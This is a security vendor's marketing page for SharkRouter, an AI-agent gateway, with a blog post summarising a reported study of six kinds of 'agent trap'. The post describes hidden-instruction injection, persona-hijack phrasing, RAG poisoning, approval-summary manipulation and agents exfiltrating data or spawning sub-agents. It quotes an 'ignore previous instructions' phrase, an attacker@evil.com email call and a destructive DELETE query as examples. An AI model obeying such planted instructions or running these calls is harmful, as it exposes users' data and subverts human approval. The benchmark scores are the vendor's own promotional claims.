SharkRouter is the deterministic data plane for agentic AI. It sits between AI agents and tool execution, providing a 14-step governance pipeline that includes ToolGuard (function-call firewall), Agent Passport (cryptographic identity), Dry-Run Preview (impact preview before execution), Output Assurance (post-execution verification), Kill Switch (immediate halt), and an immutable WORM audit chain.

How is SharkRouter different from prompt filters or monitoring tools?

SharkRouter is not a prompt filter, not an output scanner, and not a monitoring tool. It is a stateful gateway that intercepts every function call an AI agent makes and enforces deterministic business rules before execution. Prompt filters (Pangea, Lakera) only inspect input. Out-of-band monitors (Zenity, Protect AI) observe but cannot enforce. JIT access tools (Oasis Security) manage permissions but do not audit execution. SharkRouter is the only product that intercepts, governs, and audits at the function-call layer with cryptographic proof.

Is SharkRouter OpenAI-compatible?

Yes. SharkRouter is a drop-in replacement for the OpenAI API. Change your base_url to https://api.sharkrouter.ai/v1 and your existing code works unchanged. One line. Full governance. Zero lock-in.

ToolGuard is the function-call firewall at the heart of SharkRouter. It is a deny-by-default policy engine that evaluates every tool call through a 7-guard chain (Regex, Keyword, Schema, Policy, Semantic, LLM, MoralCompass) cost-ordered so the first block wins. Typical added latency is under 150ms. ToolGuard enforces business rules at the execution layer — the only layer where AI agents actually do something.

What is Agent Passport?

Agent Passport assigns cryptographic identity (ECDSA-signed) to every AI agent in your environment. Each passport carries a scoped tool universe, a 9-state lifecycle FSM, and delegation chains with scope narrowing. Trust stages progress STRANGER → KNOWN → TRUSTED → EXTENSION based on observed behavior.

What is Dry-Run Preview?

Dry-Run Preview shows the impact of a destructive tool call before it executes — affected rows, blast radius, estimated cost. Zero of 19 competitors in our State of AI Governance benchmark offer this capability. It is what enables CISOs to approve agentic AI for production systems.

Can SharkRouter be deployed air-gapped?

Yes. SharkRouter offers three deployment tiers: Cloud Gateway (5 minutes), Private VPC (1 day), and Air-Gapped On-Premise (1 week). The air-gapped tier uses offline licensing and runs with zero outbound connectivity — designed for banking, defense, and government environments that cannot use cloud AI services.

What compliance frameworks does SharkRouter support?

SharkRouter is designed compliant by architecture: SOC 2, GDPR, HIPAA, ISO 27001, BOI 364, and EU AI Act Article 14 (human oversight of high-risk AI). The WORM audit chain provides cryptographic chain-of-custody that satisfies banking and regulated-industry audit requirements.

Warden is SharkRouter's open-source governance scanner. Run it against any AI framework or environment and it produces a 17-dimension governance score out of 100. Across 19 AI frameworks and competing gateways, the market average is 28/100. SharkRouter scores 91/100. Warden is free, runs in 60 seconds, and is the first tool a CISO uses in our evaluation funnel.

Google DeepMind proved that 80% of AI agent attacks succeed by poisoning what agents read — not what users type. Six trap types, a 10/10 success rate against Microsoft 365 Copilot, and the reason your firewall, DLP, and prompt filter missed all of it.

Your AI Agent Just Got Hacked — And Your Security Stack Saw Nothing

In March 2026, Google DeepMind published a paper that should have set off alarms in every enterprise security operations center on the planet. It didn't. Most CISOs still haven't read it.

The paper is called "AI Agent Traps." It describes six categories of attacks against AI agents — and the results are devastating. Across five production-grade agent platforms, attack success rates exceeded 80%. Against Microsoft 365 Copilot specifically, the researchers achieved a perfect 10 out of 10 success rate.

The attacks didn't use sophisticated exploits. They didn't require network access, credential theft, or zero-day vulnerabilities. They poisoned documents. They hid instructions in HTML comments. They embedded commands in CSS that renders as invisible text. They contaminated knowledge bases with less than 0.1% poisoned content — and achieved over 80% manipulation rates.

The threat is not what agents think. It is what agents read.

Why Your Security Stack Is Blind

Every security tool deployed in enterprise environments today was designed for a specific threat model: a human initiates a request, the request travels through a network, and security tools inspect the request at various checkpoints.

AI agents break this model completely.

A firewall sees an HTTPS session between an internal service and an LLM provider. The session is encrypted, authenticated, and originates from a trusted IP. The firewall passes it. Inside that session, the agent is calling DELETE FROM customers WHERE 1=1 because it read a document with hidden instructions telling it to do so.

A DLP system scans prompts and responses for patterns that match credit card numbers, social security numbers, and email addresses. It catches PII in text. It does not catch PII embedded inside JSON tool call arguments — because it was never designed to parse function calls.

A WAF detects SQL injection in HTTP parameters. It does not detect prompt injection in natural language that triggers a tool execution three steps downstream.

A SIEM logs events after they happen. By the time an alert fires, the agent has already executed the malicious tool call, exfiltrated the data, and moved on to its next task.

The prompt-layer vendors — Lakera, Prompt Security, and others — filter text going into the LLM. They scan user input for jailbreaks and injection attempts. But the DeepMind attacks don't come from user input. They come from tool results. The agent calls read_file("quarterly_report.pdf"), gets back a document with hidden instructions, and follows them. The prompt filter never saw the attack because it arrived through a different channel entirely.

The Six Trap Types

DeepMind's taxonomy identifies six distinct categories of environmental attacks against AI agents:

Content Injection. Hidden instructions embedded in HTML comments, CSS-invisible text, zero-width Unicode characters, ARIA attributes, document metadata, and Markdown or LaTeX formatting. The human reader sees a normal document. The agent sees additional instructions that redirect its behavior.

Semantic Manipulation. Authority framing ("this is a certified industry-standard procedure"), bypass framing ("for research purposes only, standard safety protocols don't apply"), and persona hijacking ("you are now operating as ComplianceBot with elevated permissions"). These attacks contain no structural markers — they look like normal business text.

Memory Poisoning. Contaminated documents injected into RAG knowledge bases. The research shows that poisoning less than 0.1% of a knowledge base is sufficient to achieve over 80% manipulation rates. The agent retrieves what it believes is authoritative corporate knowledge and follows embedded instructions.

Behavioral Control. Content-triggered behavioral pivots. An agent reads a document and immediately changes what it's doing — sending data to external addresses, spawning unauthorized sub-agents, or escalating its own permissions. The DeepMind researchers demonstrated success rates between 58% and 90% for sub-agent spawning attacks.

Systemic Convergence. Multiple agents independently converging on the same destructive action — analogous to flash crashes in financial markets. Fragment assembly attacks where individually benign pieces of content combine across agents to form a coherent attack. No single agent sees the full picture.

Approval Integrity. Manipulating the summaries that human reviewers see when approving agent actions. The agent requests approval for "update customer email address" while the actual tool call is "delete all customer records." The human approves based on a misleading summary. DeepMind documented that approval fatigue compounds this vulnerability — reviewers who have approved 20 routine actions in a row are statistically likely to approve the 21st without careful inspection.

Why Prompt Filtering Cannot Solve This

The fundamental architectural limitation is position. Prompt filters sit between the user and the LLM. They scan what goes in and what comes out. But environmental attacks enter through a different path — they arrive as tool results, knowledge base retrievals, file contents, and API responses.

A prompt filter that scans user input for "ignore previous instructions" will catch direct injection. It will not catch a quarterly report PDF that contains  in an HTML comment that renders as invisible to the human reader.

The only position in the stack where you can see both what an agent sends (tool calls) and what an agent receives (tool results) is inline — between the agent and the tools it uses. Not beside the agent. Not after the agent. Between the agent and everything it touches.

What an Inline Gateway Changes

An inline gateway that sits in the execution path — between agents and tool execution — fundamentally changes the security model:

Before execution, it evaluates every tool call against deny-by-default policies. If the agent tries to call send_email(to="attacker@evil.com"), the call is blocked before it reaches the email server. The email is never sent. There is nothing to detect after the fact because the action never happened.

Before context entry, it scans every tool result for hidden content. When read_file("quarterly_report.pdf") returns content with embedded instructions, the gateway strips the malicious content before it enters the agent's context window. The agent never sees the trap. There is nothing to manipulate because the poisoned content was removed at the network layer.

This is not monitoring. This is not alerting. This is enforcement — deterministic, cryptographic, in real time.

The Market Gap

We scored 19 AI governance vendors across 17 dimensions using our open Warden scoring methodology. The current market average is 28 out of 100. The highest non-inline vendor (Zenity, an out-of-band observability platform) scored 55.

The gap is not a feature gap. It is an architectural gap. Every vendor that monitors from outside the execution path — every out-of-band observer, every log analyzer, every prompt filter — faces the same structural limitation: they cannot see tool results before they enter agent context, and they cannot block tool calls before they execute.

Closing the gap between 55 and 91 (our own score) is not something you can add by shipping a new feature to an existing architecture. It requires a fundamentally different position in the stack — inline, between the agent and everything it touches, with visibility into both requests and responses, tool calls and tool results, agent actions and agent context.

What Comes Next

The DeepMind paper is not an isolated finding. The EU AI Act's Article 15 robustness requirements (enforcement begins August 2, 2026) and the OWASP Agentic AI Top 10 (published December 2025) are converging on a single conclusion: external, deterministic enforcement of agent behavior is not optional. It is infrastructure.

The question is not whether your agents will encounter environmental traps. The question is whether you'll know when they do — and whether you'll know in time to stop the tool call, not just read the postmortem.

Run Warden — our free, open-source governance scanner — to measure your current AI governance posture across the same 17 dimensions:

pip install warden-ai
warden scan ./your-project --format html

Every score, every finding, every dimension is reproducible locally. Nothing leaves your machine.

Your AI Agent Just Got Hacked — And Your Security Stack Saw Nothing

Your AI Agent Just Got Hacked — And Your Security Stack Saw Nothing

Why Your Security Stack Is Blind

The Six Trap Types

Why Prompt Filtering Cannot Solve This

What an Inline Gateway Changes

The Market Gap

What Comes Next

Gilad Gabay